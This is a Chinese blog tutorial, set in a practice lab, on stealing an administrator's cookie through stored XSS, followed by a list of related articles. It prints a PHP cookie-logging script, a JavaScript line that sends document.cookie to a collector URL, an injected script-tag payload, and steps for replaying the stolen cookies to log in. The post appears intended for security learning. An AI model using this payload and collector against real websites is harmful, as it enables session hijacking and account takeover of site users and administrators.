通过XSS注入获取管理员cookie

最新推荐文章于 2024-07-10 17:05:37 发布
最新推荐文章于 2024-07-10 17:05:37 发布
阅读量1.5k 收藏 6
点赞数 2
分类专栏: 渗透测试 网络安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39215211/article/details/115391994
版权

通过XSS注入获取管理员cookie

注:本片文章仅供学习参考!利用本文做的所有事情与作者无关!

实验环境

1、WAMP

2、Firefox 游览器

3、在线靶场

4、WINDOWS系统

实验准备

首先在wamp的www目录下准备两个文件

第一个文件名为log.php,内容如下:

<?php
$cookie=$_GET['cookie'];
$str=fopen('cookie.txt','a+');
fwrite($str,"$cookie\n");
fclose($str);
?>

代码实现通过URL传参,并把其保存到当前目录下的cookie.txt文件中,cookie.txt文件需要提前创建!
第二个文件名为1.js,内容如下:

new Image().src="http://127.0.0.1/log.php?cookie=" + encodeURI(document.cookie);

js的内容为获取当前cookie值,并把它作为参数传递到前面的URL中

代码测试

访问log.php并传入参数6666666
访问
可以发现页面并无任何显示

然后访问当前目录下的cookie.txt
在这里插入图片描述
发现cookie.txt显示我们刚才传入的参数,说明代码并无问题。

开始注入

构造payload
<script src=//127.0.0.1/1.js></script>
在注入点开始注入

在这里插入图片描述
在这里插入图片描述

保存之后刷新页面

在这里插入图片描述
可以看到1.js已经正常相应,此时刷新cookie.txt页面
在这里插入图片描述
可以看到,已经获取到cookie值
然后使用插件修改cookie值进行测试
在这里插入图片描述
修改之后保存cookie,当捕获到多个cookie值时,每个都要有,否则可能会无法完成登录!如下:
在这里插入图片描述

在这里插入图片描述
所有cookie都编辑好之后刷新登录页面发现登录成功!
在这里插入图片描述

获取管理员COOKIE同理,当你把XSS注入到你的个人信息中时,管理员在查看你的个人信息时就会获取到管理员的COOKIE(并不是一定会成功)然后将管理员的COOKIE发送到你的URL下的TXT文件中
雪下的时候
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss Cookie
10-09
2. **伪造Cookie**:攻击者可以设置新的Cookie,使用户在不知情的情况下携带攻击者设定的状态信息,如假冒管理员权限。 3. **CSRF令牌盗用**:某些网站使用CSRF(Cross-site Request Forgery)令牌防止非预期的操作...
xss获取cookie(封神台第三章)
qq_66013948的博客
09-20 395
之后,在xss.pt网站中注册一个账号,生成一个xss代码用po......的方式(非p时效短),然后将代码放在有xss漏洞的地方,上传表单。之前说过cookie就是在访问网站的时候第一个传递的数据,这其实是不全面的,cookie真正的指的其实就是某些网站为了辨别用户身份,进行session追踪而存储在用户本地终端上的数据,一般经过加密。首先应该看一下将能够输入内容的地方全部写上,然后观察后面的反馈,之后寻找xss注入点,可以按F12审查元素,寻找可执行的xss语句。
web安全入门(第五章-1)cookie注入
Yzz_的博客
05-26 783
一、cookie注入 什么是CookieCookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取管理员Cookie,你可以无需密码直接登陆管理员账号。 cookie注入满足什么条件? 1.满足的条件[] 2.网站会获取cookie传参然后和原有sql语句拼接在传入数据库。 为什么Cookie注入擦出了爱情的火花?(原理部分) 在动态脚本语言中存在超全局变量可以获取多种传参方式(基本上) 很多时候开发在开发的时候为了考虑到多种接受参数,在接受参数的时候都是用多种解释
网络安全渗透测试零基础入门必知必会】之XSS攻击获取用户cookie和用户密码(实战演示)零基础入门到精通收藏这一篇就够了
最新发布
HUANGXIN9898的博客
07-10 1242
渗透测试-地基篇:该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意:本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
利用XSS漏洞轻松拿到登录用户的cookie
weixin_34277853的博客
06-06 2647
前言 最近在逛小程序,其中发现一个小程序是申请用户信息后自动在某站注册账号。 于是便去网站看了下,WOW!好多输入框~就顺手试了下xss。 找到XSS漏洞 本着学习交流的目的,用颤巍巍的手指在用户名称的输入框里输下了如下代码: <script>alert(1)</script> emm...没反应,内心一阵失落,并没有预期中那样弹出个框来,叹了口气。 但是,好歹是个程序...
ctf xss利用_利用存储型XSS跨站漏洞偷取用户Cookie实战
weixin_42611310的博客
02-23 1603
声明 :严禁读者利用以下介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !攻击者要偷取Cookie , 就要让他们精心构造的恶意代码在受害者的计算机上运行 , 一般来说 , 是在用户访问一个网页的时候执行一段JavaScript代码 , 这段代码会...
[ctfhub]-xss详解
weixin_52116519的博客
04-28 5001
1、明确cookie的作用 当你登录账号密码,服务端就会给你一个cookie,这样你在这个平台上的操作就带上了cookie来验证身份,而不用每一次操作都要你登录账号密码。cookie相当于每个人的登录凭证,如果得到了别人的cookie,特别是管理员的,我们将可以不用输账号密码,直接登录,从而获取管理员权限。 2、XSS的目的 获取别人的cookie。 Web渗透测试之XSS攻击:反射型XSS 获得cookie的方法:我们在有XSS漏洞的搜索栏中输入<script>alert(document.c
攻防世界 web高手进阶区 10分题 xss1
闵行小鱼塘
11-10 721
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是xss1的writeup
[BBP系列二] Uber XSS via Cookie 1
08-03
在2017年8月30日,一位安全研究员分享了他在Uber的一个XSS(跨站脚本)漏洞报告的细节,该漏洞允许攻击者通过Cookie注入任意JavaScript代码。这篇技术文章主要介绍了如何利用JSONP请求中的一个漏洞来实现XSS攻击。 ...
xss、脏牛提权.zip
06-18
使用脏牛提权exp,攻击者可以尝试在目标系统上获取管理员权限,进行非法活动。为了防止脏牛漏洞的利用,用户和管理员应当保持系统的及时更新,安装官方发布的安全补丁,并且定期进行安全扫描和审计。 总的来说,...
Web应用安全XSS盗取cookiepayload(实验习题).docx
06-17
1. 攻击者将可以获取并发送管理员Cookie 的恶意 XSS 脚本到管理员访问的网站。 2. 当管理员访问网站的时候,恶意的 XSS 脚本将会被运行。 3. 攻击者就可以接收到管理员发送的 Cookie。 防御 XSS 攻击 为了防御 ...
驾校培训网站管理系统-v1.0-Cookie注入.doc
07-05
2. **权限提升**:一旦攻击者获取管理员凭证,他们可以登录到后台,执行修改、删除等高权限操作。 3. **会话劫持**:攻击者可以通过修改受害者的Cookie来模拟他们的身份,进行非法活动。 4. **网站破坏**:恶意的...
xss利用之获取管理员cookie
weixin_48421613的博客
08-27 3090
xss利用之获取后台管理员cookie 首先需要声明的是,我们这次讲解的小案例是开源的一个环境,并不是盲打xss,也就是说我们是可以在自己的服务器上搭建环境而后进行一系列的测试 现我们在靶场找到存储型(持久型)xss注入,我们该如何通过xss获取超级管理员cookie从而登录后台呢? 通过测试,我们得知在留言板的title(标题 )处存在存储型xss注入,通过后台访问可以执行script代码 - 我们通过观察,得知body(内容)内的script代码被过滤,但是title内的被执行了
XSS平台的简单搭建和获取cookie
m0_65096687的博客
10-09 2479
XSS平台可以辅助安全测试人员对XSS相关的漏洞危害进行深入学习,了解XSS的危害重视XSS的危害,如果要说XSS可以做哪些事情,XSS可以做js能够做的所有事情。包括但不限于:窃取Cookie、后台增删改文章、钓鱼、利用XSS漏洞进行传播、修改网页代码、网站重定向、获取用户信息(如浏览器信息,IP地址等)等。选择蓝莲花XSS平台的原因很简单,因为网络上大多数XSS平台都是需要注册啊,绑定什么的。2.把下载好的蓝莲花解压在PHPstudy的WWW目录下,这里为我更名为XSS。只需要修改登录密码进行提交。
【每天学习一点新知识】XSS如何绕过HttpOnly获取Cookie以及XSS与CORS漏洞利用
RexHa的博客
10-27 5789
Cors请求可分为两类,简单请求和非简单请求。所谓简单请求,就是请求方式为GET,POST,HEAD这三种之一,并且HTTP头不超出(Accept,Accept-Language,Content-Language,Lat-Event-ID,Content-Type)这几种字段。(Cross-origin resource sharing),是H5提供的一种机制,WEB应用程序可以通过在HTTP增加字段来告诉浏览器,哪些不同来源的服务器是有权访问本站资源的,当不同域的请求发生时,就出现了跨域的现象。
利用 XSS 获取 Cookie 利用DOM XSS
weixin_71416901的博客
06-21 973
XSS
XSS获取管理员COOKIE
weixin_44940180的博客
08-08 1573
扫到管理员登录路径: http://192.168.3.83:800/DedeCmsV5.6-GBK-Final/uploads/dede/login.php 用xss平台 会员账号/密码:like/123456 爆破管理员账号/密码:admin/admin 登录会员账号 找一篇文字评论,等待管理员上线 管理员登录 然后在xss平台获取cookie toplocation是返回的管理员页面 然后打开之前获取到的管理员登录页面 替换掉cookie后,访问 http://192.168.3.83
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战篇
m0_67844671的博客
10-05 4098
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
xss获取cookie的方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-27 1827
xss获取cookie简单步骤如下: 1、在存在漏洞的论坛中发日志。 2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了。 3、这是没有账户前的登陆界面。 4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据,xss获取cookie 5、替换cookie后不用输用户名密码
xss怎么获取目标cookie
08-02
XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者可以通过注入恶意脚本来获取用户的感信息,如cookie。在存储型XSS击中,攻击者将恶意脚本存储在目标网站的数据库中,当其他用户或管理员访问包含该恶意脚本的页面时,脚本会被执行,从而导致用户的cookie信息被窃取。 根据引用[1]提供的信息,攻击者可以在目标网站的博客或论坛等地方发表帖子或留下评论,内容包含恶意脚本。当其他用户或管理员打开包含恶意脚本的页面时,脚本会触发并将用户的cookie信息发送到攻击者指定的网站。 引用[2]提供了一个获取cookie的示例代码,其中的cookie.asp文件会将获取到的cookie信息写入到code.txt文件中。攻击者可以通过构造恶意脚本,将cookie信息发送到自己的服务器上。 引用[3]提供了另一种获取cookie的方法,通过将cookie信息作为参数发送到指定的URL,攻击者可以在该URL的服务器上获取到用户的cookie信息。 总结来说,攻击者可以通过存储型XSS漏洞,在目标网站上注入恶意脚本,从而获取用户的cookie信息。这些信息可以被用于未授权访问用户账户等恶意行为。为了防止XSS攻击,网站开发者应该对用户输入进行严格的过滤和转义,以防止恶意脚本的注入。用户也应该保持浏览器和操作系统的更新,并避免点击可疑的链接或下载未知来源的文件,以减少受到XSS攻击的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值